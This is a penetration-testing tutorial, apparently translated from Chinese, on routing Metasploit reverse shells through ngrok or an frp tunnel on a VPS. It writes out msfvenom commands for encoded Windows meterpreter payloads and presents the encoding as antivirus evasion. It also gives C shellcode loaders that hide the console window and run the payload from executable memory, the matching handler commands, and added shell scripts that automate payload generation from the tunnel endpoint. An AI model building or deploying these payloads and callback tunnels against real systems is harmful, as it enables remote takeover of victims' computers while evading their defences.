0x01. Foreword
In a penetration testing workflow, MSF (Metasploit Framework) is one of the standard tools. When the attacking machine sits on an internal network behind NAT, an MSF listener on it cannot be reached by a reverse-connecting payload running on a target out on the public network, so a port-forwarding step is needed. This post briefly describes two ways to expose an MSF listener on the internal network to the public network.
0x02. Two common forwarding methods
Method ①: Use Ngrok intranet mapping
First, you need an account on the ngrok website (https://ngrok.com/). After registering, download the ngrok client from https://ngrok.com/download.
After the download completes, copy the archive to Kali, unpack it, and register the authtoken that the ngrok dashboard assigned to your account. In ngrok v2 this is:
./ngrok authtoken <your_authtoken>
The next step is simple. To forward a local HTTP service to the public network, run the following; ngrok maps local port 80 to a public ngrok domain name:
./ngrok http 80
OK, HTTP works; now forward TCP, which is what an MSF reverse_tcp handler needs. The local port given here (8888) is the one the handler will listen on. ngrok prints a public hostname and a port it assigned in the Forwarding line of its status screen; that hostname and port, not the Kali address, are what the payload must connect back to:
./ngrok tcp 8888
Next, generate a test payload with msfvenom. LHOST is the public ngrok hostname and LPORT is the public port ngrok assigned to the tunnel:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<ngrok public hostname> LPORT=<ngrok public port> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f exe -o payload.exe
A brief note on the msfvenom parameters:
-p select the payload
-e select an encoder (different encoders give different AV-evasion results; some encoders make a noticeable difference against particular AV products such as Huorong (火绒))
-i number of encoding iterations
-b bad characters that must not appear in the output
-f output format
-a target architecture: x86 | x64 | x86_64
--platform target operating system
LHOST / LPORT in this setup are the public hostname of the ngrok tunnel you were assigned and the public port ngrok allocated to it; the port is chosen by ngrok, not by you, and changes when the tunnel is restarted unless you have a reserved address.
Of course, you can also generate shellcode in C format:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<ngrok public hostname> LPORT=<ngrok public port> -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f c
Use VC++ 6.0 to compile the following code:
#include <stdio.h>
// Do not display a console window at runtime
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
// Paste the array produced by msfvenom -f c here
unsigned char buf[] = "Buf array";
// Jumps straight into the .data array. This only works where data pages are
// executable, i.e. with DEP off (typical of the VC++ 6.0 era); the VirtualAlloc
// loader in the frp section below does not depend on that.
int main(void)
{
    ((void (*)(void))&buf)();
    return 0;
}
Back to the topic: start the MSF handler. It listens on the local port that ngrok forwards to (8888), not on the public port ngrok assigned:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 8888
exploit
When the payload runs on the target, the Meterpreter session arrives through the ngrok tunnel.
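The ngrok procedure above ends with a public hostname and port that have to be copied into msfvenom by hand, plus a local port for the handler. The following shell script, added here and not part of the original post, reads all three from ngrok's local inspection API instead. It assumes ngrok v2 (the ./ngrok client used above), whose API is served on http://127.0.0.1:4040/api/tunnels by default; the JSON embedded in the script is a constructed sample of that API's response, with a made-up hostname and port.

```shell
#!/bin/sh
# Added example, not code from the original post: pull the public tcp
# endpoint out of ngrok's local inspection API and derive the msfvenom
# LHOST/LPORT and the handler's local lport from it, instead of retyping
# them from the tunnel status screen. Assumes ngrok v2, whose API is on
# http://127.0.0.1:4040/api/tunnels by default.

# Constructed sample of the API response for "./ngrok tcp 8888"; the
# hostname and public port are made up, not real ngrok assignments.
SAMPLE_TUNNELS_JSON='{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"tcp://0.tcp.ngrok.io:12345","proto":"tcp","config":{"addr":"localhost:8888","inspect":false}}],"uri":"/api/tunnels"}'

# On a live box the same text comes from:
#   curl -s http://127.0.0.1:4040/api/tunnels

# Print host:port of the first tcp tunnel in the JSON passed as $1
# (empty output if there is none).
ngrok_tcp_endpoint() {
    printf '%s\n' "$1" \
        | tr ',' '\n' \
        | sed -n 's/.*"public_url":"tcp:\/\/\([^"]*\)".*/\1/p' \
        | head -n 1
}

# Print the local port ngrok forwards the tunnel to (the handler's lport).
ngrok_local_port() {
    printf '%s\n' "$1" \
        | tr ',' '\n' \
        | sed -n 's/.*"addr":"[^"]*:\([0-9]*\)".*/\1/p' \
        | head -n 1
}

endpoint_host() { printf '%s' "${1%:*}"; }
endpoint_port() { printf '%s' "${1##*:}"; }

# msfvenom command for the post's payload. LHOST/LPORT are the public
# ngrok endpoint; Kali's own address would be unreachable from the target.
BADCHARS='\x00\x0a\xff'
msfvenom_cmd() {
    ep=$(ngrok_tcp_endpoint "$1")
    if [ -z "$ep" ]; then
        echo "no tcp tunnel in ngrok API output" >&2
        return 1
    fi
    printf '%s\n' "msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$(endpoint_host "$ep") LPORT=$(endpoint_port "$ep") -e x86/shikata_ga_nai -b '$BADCHARS' -i 15 -f exe -o payload.exe"
}

# Matching handler resource file: it binds the *local* tunnel port, never
# the public one. Redirect to handler.rc and run: msfconsole -r handler.rc
handler_rc() {
    lp=$(ngrok_local_port "$1")
    [ -n "$lp" ] || return 1
    printf 'use exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nset lhost 127.0.0.1\nset lport %s\nexploit -j\n' "$lp"
}

msfvenom_cmd "$SAMPLE_TUNNELS_JSON"
handler_rc "$SAMPLE_TUNNELS_JSON"
```

Because the public port is assigned by ngrok and changes every time the tunnel is restarted (unless you have a reserved address), the payload has to be regenerated after each restart; reading the endpoint from the API rather than from memory avoids shipping a payload that points at a dead port.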
Method ②: Use frp + VPS intranet mapping
First, download frp from GitHub: https://github.com/fatedier/frp/releases. I downloaded the Linux 64-bit build (the server is Linux). Put a copy on Kali and on the VPS, unpack both, and then configure each side. The ini files below are the format used by the frp releases of the time; current frp releases have moved to a TOML config file, so check the example files shipped with your release if you are on a newer version.
Server-side frps.ini (ini comments use # or ;, not //):
[common]
# 0.0.0.0 = listen on every address of this machine
bind_addr = 0.0.0.0
# port frpc connects to
bind_port = 6531
# web dashboard listen address and port
dashboard_addr = 0.0.0.0
dashboard_port = 7500
# dashboard user name and password
dashboard_user = admin
dashboard_pwd = crlf
# shared secret that frpc must present
token = crlf
The token is the only thing that stops strangers on the Internet from registering proxies through your frps, so use a long random value rather than a short word like the one above; likewise a dashboard bound to 0.0.0.0 with a guessable password shows anyone your forwarding setup, so bind it to 127.0.0.1 or firewall port 7500.
Once the configuration is in place, start the server:
Method one: ./frps -c frps.ini (foreground; the detailed listening information is printed to the terminal)
Method two: nohup ./frps -c frps.ini > log.txt & (background)
After a successful start, the status can be viewed in a browser on the dashboard port (7500).
Next, configure the client-side frpc.ini on Kali:
[common]
# VPS IP
server_addr = 66.23.xx
# port frps listens on (bind_port in frps.ini)
server_port = 6531
# must equal the token in frps.ini
token = crlf

[msf]
# tcp protocol
type = tcp
# the local side is the MSF handler, so 127.0.0.1 is enough
local_ip = 127.0.0.1
# port the handler listens on locally
local_port = 6759
# port opened on the VPS; connections to it are forwarded to 127.0.0.1:6759 on Kali
remote_port = 6000
Start the client: ./frpc -c frpc.ini
OK, then generate the test payload with msfvenom as above. For frp, LHOST is the VPS address (server_addr) and LPORT is remote_port, the port frps opens on the VPS; the handler's local port 6759 never appears in the payload:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<VPS IP> LPORT=6000 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 15 -f exe -o payload.exe
Shellcode can be used as well:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=<VPS IP> LPORT=6000 -e x86/shikata_ga_nai -i 15 -b '\x00' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c
PrependMigrate=true together with PrependMigrateProc=svchost.exe prepends a stub that spawns a new svchost.exe process and migrates the payload into it, so the session survives if the dropper exits.
You can also use the windows/meterpreter/reverse_tcp_rc4 payload, which RC4-encrypts the staging traffic so the second stage is not sent in the clear; the handler must then be set to the same payload with the same RC4PASSWORD.
Create a 32-bit project in VC++ 6.0 and compile:
#include <stdio.h>
#include <string.h>
#include <windows.h>
// Do not display a console window at runtime
#pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
// Paste the array produced by msfvenom -f c here
unsigned char shellcode[] = "Place the generated shellcode";
int main(void)
{
    // Allocate an RWX region and copy the shellcode into it, so execution does
    // not depend on the .data section being executable (works with DEP on)
    LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (Memory == NULL)
        return 1;
    memcpy(Memory, shellcode, sizeof(shellcode));
    ((void (*)(void))Memory)();
    return 0;
}
Finally, start the MSF handler and wait for the session. lhost stays 127.0.0.1 and lport is the local_port from frpc.ini, because frpc delivers the forwarded connection to the local machine:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6759
exploit
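The frp method above involves three different port numbers (6531 for the frp control connection, 6000 opened on the VPS, 6759 on Kali) and one shared token, and mixing them up is the usual reason a session never arrives. The following shell script, added here and not part of the original post or of frp itself, parses an frps.ini/frpc.ini pair, checks that server_port matches bind_port and that the tokens agree, and prints which value goes into msfvenom and which into the handler. It assumes the old-style ini format shown above; the two config files are constructed samples written to a temporary directory, with 192.0.2.10 (a documentation address) standing in for the VPS IP, and the dashboard bound to 127.0.0.1 as a hardening choice.

```shell
#!/bin/sh
# Added example, not code from the original post: read an frps.ini and
# frpc.ini pair, check that the values which must agree actually do
# (server_port vs bind_port, token vs token), then print which port goes
# where: LHOST/LPORT for msfvenom and the local port for the handler.
# Assumes the old-style ini config of the frp releases used in the post.

# Constructed sample files written to a temp dir. 192.0.2.10 is a
# documentation address standing in for the real VPS IP.
FRP_DIR=$(mktemp -d)
cat > "$FRP_DIR/frps.ini" <<'EOF'
[common]
bind_addr = 0.0.0.0
bind_port = 6531
dashboard_addr = 127.0.0.1
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = crlf
token = crlf
EOF
cat > "$FRP_DIR/frpc.ini" <<'EOF'
[common]
server_addr = 192.0.2.10
server_port = 6531
token = crlf

[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 6759
remote_port = 6000
EOF
# Same client with a mistyped token: frps rejects it at connect time.
sed 's/^token = crlf$/token = crlf2/' "$FRP_DIR/frpc.ini" > "$FRP_DIR/frpc-bad.ini"

# ini_get FILE SECTION KEY: print the value of KEY inside [SECTION].
# Handles "key = value" and "key=value" and strips ; and # comments.
ini_get() {
    awk -v sec="[$2]" -v key="$3" '
        /^[ \t]*\[/ { s = $0; gsub(/[ \t]/, "", s); insec = (s == sec); next }
        insec {
            line = $0
            sub(/[#;].*$/, "", line)
            if (match(line, /^[ \t]*[A-Za-z0-9_]+[ \t]*=/)) {
                k = substr(line, 1, RLENGTH); gsub(/[ \t=]/, "", k)
                if (k == key) {
                    v = substr(line, RLENGTH + 1)
                    gsub(/^[ \t]+|[ \t]+$/, "", v)
                    print v
                    exit
                }
            }
        }' "$1"
}

# check_frp_pair FRPS_INI FRPC_INI PROXY: fail on a mismatch, otherwise
# print the values to plug into msfvenom and into the handler.
check_frp_pair() {
    bind=$(ini_get "$1" common bind_port)
    sport=$(ini_get "$2" common server_port)
    stoken=$(ini_get "$1" common token)
    ctoken=$(ini_get "$2" common token)
    if [ "$bind" != "$sport" ]; then
        echo "frpc server_port=$sport but frps bind_port=$bind" >&2
        return 1
    fi
    if [ "$stoken" != "$ctoken" ]; then
        echo "token differs between frps.ini and frpc.ini" >&2
        return 1
    fi
    vps=$(ini_get "$2" common server_addr)
    rport=$(ini_get "$2" "$3" remote_port)
    lport=$(ini_get "$2" "$3" local_port)
    [ -n "$vps" ] && [ -n "$rport" ] && [ -n "$lport" ] || return 1
    # LHOST/LPORT go into msfvenom; HANDLER_LPORT is "set lport" in msfconsole
    printf 'LHOST=%s LPORT=%s HANDLER_LPORT=%s\n' "$vps" "$rport" "$lport"
}

check_frp_pair "$FRP_DIR/frps.ini" "$FRP_DIR/frpc.ini" msf
```

Run it against the real files before generating the payload: a token or port mismatch shows up here as a non-zero exit, instead of as a silent frpc reconnect loop while the target's callback goes nowhere.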